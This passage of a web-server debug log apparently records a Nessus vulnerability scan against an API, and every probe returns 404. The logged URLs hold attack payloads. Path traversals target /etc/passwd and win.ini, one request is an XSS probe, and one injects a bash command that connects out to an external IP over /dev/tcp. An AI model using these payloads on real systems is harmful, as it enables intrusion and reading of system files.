debug: [1667258259138, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.146Z debug: [1667258259144, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.151Z debug: [1667258259150, duration: 1] GET:/api/version, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.204Z debug: [1667258259202, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.212Z debug: [1667258259211, duration: 1] GET:/api/search?NS-query-pat=..\..\..\..\..\..\..\..\winnt\win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.226Z debug: [1667258259223, duration: 1] GET:/api/search?NS-query-pat=../../../../../../../../../etc/passwd, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.249Z debug: [1667258259247, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.258Z debug: [1667258259258, duration: 0] GET:/api/ifx/?LO=../../../../../etc/passwd, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.280Z debug: [1667258259278, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.290Z debug: [1667258259289, duration: 0] GET:/api/status.xsl., reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.294Z debug: [1667258259293, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.304Z debug: [1667258259303, duration: 1] GET:/api/cOKHGdXaLGre, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.314Z debug: [1667258259313, duration: 1] PUT:/api/cOKHGdXaLGre, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.333Z debug: [1667258259332, duration: 1] GET:/api/cOKHGdXaLGre, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.335Z debug: [1667258259331, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.342Z debug: [1667258259341, duration: 1] GET:/api/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.379Z debug: [1667258259377, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.391Z debug: [1667258259390, duration: 0] POST:/api/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.425Z debug: [1667258259424, duration: 0] GET:/api/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.440Z debug: [1667258259439, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.456Z debug: [1667258259455, duration: 1] POST:/api/iControl/iControlPortal.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.459Z debug: [1667258259458, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.469Z debug: [1667258259468, duration: 1] GET:/api/DB4Web/dtm-nessus-dmz03:23/foo, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.492Z debug: [1667258259491, duration: 1] GET:/api/CFIDE/administrator/index.cfm, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.510Z debug: [1667258259509, duration: 1] GET:/api/nitro/v1/config/mps, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.517Z debug: [1667258259515, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.527Z debug: [1667258259526, duration: 0] GET:/api/cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=..\..\..\Windows\System32\drivers\etc\&readmeText=1, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.536Z debug: [1667258259534, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.543Z debug: [1667258259542, duration: 1] GET:/api/dev/, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.571Z debug: [1667258259570, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.579Z debug: [1667258259578, duration: 1] GET:/api/axis/DirectDownload.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.591Z debug: [1667258259589, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.600Z debug: [1667258259599, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.605Z debug: [1667258259604, duration: 0] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.614Z debug: [1667258259613, duration: 1] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.615Z debug: [1667258259612, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.622Z debug: [1667258259622, duration: 0] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.624Z debug: [1667258259621, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.626Z debug: [1667258259625, duration: 1] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.632Z debug: [1667258259629, duration: 3] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.634Z debug: [1667258259633, duration: 0] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.640Z debug: [1667258259639, duration: 0] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.642Z debug: [1667258259642, duration: 0] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.647Z debug: [1667258259646, duration: 1] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.650Z debug: [1667258259649, duration: 1] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.653Z debug: [1667258259653, duration: 0] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.659Z debug: [1667258259659, duration: 0] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.661Z debug: [1667258259661, duration: 0] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.667Z debug: [1667258259666, duration: 1] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.670Z debug: [1667258259669, duration: 1] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.674Z debug: [1667258259673, duration: 1] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.680Z debug: [1667258259677, duration: 1] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.682Z debug: [1667258259681, duration: 1] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.686Z debug: [1667258259685, duration: 1] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.691Z debug: [1667258259690, duration: 0] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.693Z debug: [1667258259692, duration: 1] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.699Z debug: [1667258259698, duration: 0] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.700Z debug: [1667258259700, duration: 0] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.706Z debug: [1667258259705, duration: 1] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.707Z debug: [1667258259706, duration: 1] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.712Z debug: [1667258259712, duration: 0] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.716Z debug: [1667258259715, duration: 1] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.719Z debug: [1667258259719, duration: 0] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.725Z debug: [1667258259725, duration: 0] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.728Z debug: [1667258259728, duration: 0] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.734Z debug: [1667258259733, duration: 0] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.736Z debug: [1667258259736, duration: 0] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.744Z debug: [1667258259744, duration: 0] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.746Z debug: [1667258259745, duration: 0] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.752Z debug: [1667258259752, duration: 0] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.753Z debug: [1667258259753, duration: 0] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.760Z debug: [1667258259759, duration: 1] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.761Z debug: [1667258259761, duration: 0] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.767Z debug: [1667258259767, duration: 0] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.769Z debug: [1667258259768, duration: 0] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.775Z debug: [1667258259774, duration: 1] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.776Z debug: [1667258259775, duration: 1] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.783Z debug: [1667258259782, duration: 1] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.784Z debug: [1667258259783, duration: 1] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.793Z debug: [1667258259793, duration: 0] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.794Z debug: [1667258259794, duration: 0] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.802Z debug: [1667258259801, duration: 0] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.803Z debug: [1667258259802, duration: 1] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.818Z debug: [1667258259817, duration: 1] GET:/api/cgi-bin/login, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.820Z debug: [1667258259819, duration: 0] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.829Z debug: [1667258259828, duration: 0] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.830Z debug: [1667258259830, duration: 0] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.846Z debug: [1667258259845, duration: 1] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.848Z debug: [1667258259847, duration: 0] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.857Z debug: [1667258259857, duration: 0] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.859Z debug: [1667258259859, duration: 0] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.867Z debug: [1667258259866, duration: 0] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.872Z debug: [1667258259871, duration: 1] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.875Z debug: [1667258259874, duration: 1] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.879Z debug: [1667258259878, duration: 1] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.883Z debug: [1667258259882, duration: 0] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.891Z debug: [1667258259890, duration: 1] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.893Z debug: [1667258259892, duration: 1] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.900Z debug: [1667258259899, duration: 0] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.901Z debug: [1667258259900, duration: 1] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.909Z debug: [1667258259908, duration: 0] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.910Z debug: [1667258259909, duration: 1] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.917Z debug: [1667258259916, duration: 1] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.918Z debug: [1667258259918, duration: 0] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.925Z debug: [1667258259924, duration: 1] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.927Z debug: [1667258259925, duration: 1] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.932Z debug: [1667258259931, duration: 0] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.933Z debug: [1667258259932, duration: 0] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.938Z debug: [1667258259938, duration: 0] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.943Z debug: [1667258259942, duration: 1] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.949Z debug: [1667258259948, duration: 0] GET:/api/cgi-bin/status, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.950Z debug: [1667258259949, duration: 1] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.955Z debug: [1667258259955, duration: 0] GET:/api/cgi-bin/status.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.959Z debug: [1667258259959, duration: 0] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.963Z debug: [1667258259963, duration: 0] GET:/api/cgi-bin/test.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.967Z debug: [1667258259967, duration: 0] GET:/api/cgi-bin/status, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.972Z debug: [1667258259972, duration: 0] GET:/api/cgi-bin/test.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.976Z debug: [1667258259975, duration: 0] GET:/api/cgi-bin/status.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.980Z debug: [1667258259979, duration: 0] GET:/api/cgi-bin/test-cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.984Z debug: [1667258259983, duration: 1] GET:/api/cgi-bin/test.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.990Z debug: [1667258259989, duration: 0] GET:/api/cgi-bin/upload.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.996Z debug: [1667258259995, duration: 0] GET:/api/cgi-bin/test.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.001Z debug: [1667258260000, duration: 0] GET:/api/cgi-bin/urlcount.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.004Z debug: [1667258260003, duration: 0] GET:/api/cgi-bin/test-cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.009Z debug: [1667258260008, duration: 0] GET:/api/cgi-bin/viewcvs.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.015Z debug: [1667258260014, duration: 0] GET:/api/cgi-bin/upload.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.019Z debug: [1667258260018, duration: 0] GET:/api/cgi-bin/wa, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.023Z debug: [1667258260022, duration: 1] GET:/api/cgi-bin/urlcount.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.028Z debug: [1667258260027, duration: 1] GET:/api/cgi-bin/wa.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.040Z debug: [1667258260039, duration: 0] GET:/api/cgi-bin/viewcvs.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.041Z debug: [1667258260040, duration: 1] GET:/api/cgi-bin/wa.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.050Z debug: [1667258260049, duration: 1] GET:/api/cgi-bin/wa, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.052Z debug: [1667258260051, duration: 0] GET:/api/cgi-bin/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.061Z debug: [1667258260060, duration: 0] GET:/api/cgi-bin-sdb/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.063Z debug: [1667258260062, duration: 0] GET:/api/cgi-bin/wa.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.071Z debug: [1667258260070, duration: 1] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.073Z debug: [1667258260072, duration: 1] GET:/api/cgi-bin/wa.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.083Z debug: [1667258260081, duration: 0] GET:/api/cgi-sys/defaultwebpage.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.085Z debug: [1667258260084, duration: 0] GET:/api/cgi-bin/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.091Z debug: [1667258260090, duration: 0] GET:/api/cgi-sys/entropysearch.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.094Z debug: [1667258260094, duration: 0] GET:/api/cgi-bin-sdb/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.098Z debug: [1667258260097, duration: 1] GET:/api/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.103Z debug: [1667258260102, duration: 1] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.106Z debug: [1667258260105, duration: 1] GET:/api/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.111Z debug: [1667258260110, duration: 1] GET:/api/cgi-sys/defaultwebpage.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.114Z debug: [1667258260114, duration: 0] GET:/api/index.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.124Z debug: [1667258260120, duration: 3] GET:/api/cgi-sys/entropysearch.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.125Z debug: [1667258260124, duration: 1] GET:/api/nph-mr.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.150Z debug: [1667258260148, duration: 1] GET:/api/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.152Z debug: [1667258260151, duration: 1] GET:/api/query.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.159Z debug: [1667258260158, duration: 1] GET:/api/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.162Z debug: [1667258260160, duration: 0] GET:/api/session_login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.167Z debug: [1667258260166, duration: 1] GET:/api/index.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.168Z debug: [1667258260168, duration: 0] GET:/api/show_bug.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.175Z debug: [1667258260175, duration: 0] GET:/api/nph-mr.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.177Z debug: [1667258260176, duration: 0] GET:/api/test, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.184Z debug: [1667258260183, duration: 1] GET:/api/query.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.186Z debug: [1667258260185, duration: 1] GET:/api/test.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.192Z debug: [1667258260190, duration: 1] GET:/api/session_login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.194Z debug: [1667258260194, duration: 0] GET:/api/ucsm/isSamInstalled.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.204Z debug: [1667258260203, duration: 1] GET:/api/show_bug.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.205Z debug: [1667258260205, duration: 0] GET:/api/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.213Z debug: [1667258260212, duration: 1] GET:/api/test, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.215Z debug: [1667258260214, duration: 0] GET:/api/wp-login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.222Z debug: [1667258260222, duration: 0] GET:/api/wwwadmin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.223Z debug: [1667258260223, duration: 0] GET:/api/test.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.230Z debug: [1667258260229, duration: 0] GET:/api/wwwboard.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.231Z debug: [1667258260230, duration: 1] GET:/api/ucsm/isSamInstalled.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.238Z debug: [1667258260237, duration: 1] GET:/api/xampp/cgi.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.239Z debug: [1667258260239, duration: 0] GET:/api/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.247Z debug: [1667258260247, duration: 0] GET:/api/wp-login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.261Z debug: [1667258260260, duration: 0] GET:/api/wwwadmin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.270Z debug: [1667258260269, duration: 1] GET:/api/wwwboard.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.283Z debug: [1667258260283, duration: 0] GET:/api/xampp/cgi.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.608Z debug: [1667258260606, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.617Z debug: [1667258260617, duration: 0] POST:/api/cgi-bin/file_transfer.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.658Z debug: [1667258260656, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.662Z debug: [1667258260661, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.665Z debug: [1667258260664, duration: 1] GET:/api/logon?onok=%22%3e%3cscript%3ealert('axon_logon_xss.nasl')%3c%2fscript%3e, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.670Z debug: [1667258260670, duration: 0] GET:/api/error_page.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.701Z debug: [1667258260700, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.709Z debug: [1667258260707, duration: 2] GET:/api/default.asp%20, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.710Z debug: [1667258260705, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.720Z debug: [1667258260719, duration: 0] GET:/api/default.asp., reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.741Z debug: [1667258260739, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.749Z debug: [1667258260748, duration: 1] GET:/api/default.asp::$DATA, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.754Z debug: [1667258260753, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.763Z debug: [1667258260761, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.786Z debug: [1667258260784, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.795Z debug: [1667258260794, duration: 0] GET:/api/note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.802Z debug: [1667258260801, duration: 1] GET:/api/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.804Z debug: [1667258260803, duration: 1] GET:/api/note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.829Z debug: [1667258260828, duration: 1] GET:/api/trace.axd, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.851Z debug: [1667258260849, duration: 1] GET:/api/global.asa, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:40.855Z debug: [1667258260853, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.875Z debug: [1667258260874, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:40.882Z debug: [1667258260882, duration: 0] GET:/api/user_settings.cfg, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:44.155Z debug: [1667258264154, duration: 1] GET:/api/api/getServices?name[]=$(bash%20-c%20%22echo%20exploited_PORT[442]by_nessus%20%3E/dev/tcp/172.20.22.51/35695"), reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:54.039Z debug: [1667258274036, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:54.046Z debug: [1667258274045, duration: 1] GET:/api/rails_info/properties, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:54.087Z debug: [1667258274085, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:54.098Z debug: [1667258274097, duration: 1] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:18.110Z debug: [1667344878100, duration: 10] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:27.632Z debug: [1667344887630, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:27.644Z debug: [1667344887644, duration: 0] POST:/api/sdk, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:27.645Z debug: [1667344887641, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:27.653Z debug: [1667344887652, duration: 0] POST:/api/sdk, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:27.732Z debug: [1667344887731, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:27.775Z debug: [1667344887773, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:27.782Z debug: [1667344887781, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:27.786Z debug: [1667344887785, duration: 0] GET:/api/api/hpe-restapi.json, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:35.855Z debug: [1667344895854, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:35.862Z debug: [1667344895861, duration: 0] GET:/api/favicon2.iso, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:35.867Z debug: [1667344895867, duration: 0] GET:/api/favicon.iso, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:35.911Z debug: [1667344895909, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:35.917Z debug: [1667344895916, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:35.940Z debug: [1667344895939, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:35.957Z debug: [1667344895956, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:35.963Z debug: [1667344895963, duration: 0] GET:/api/properties/description.dhtml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:35.971Z debug: [1667344895971, duration: 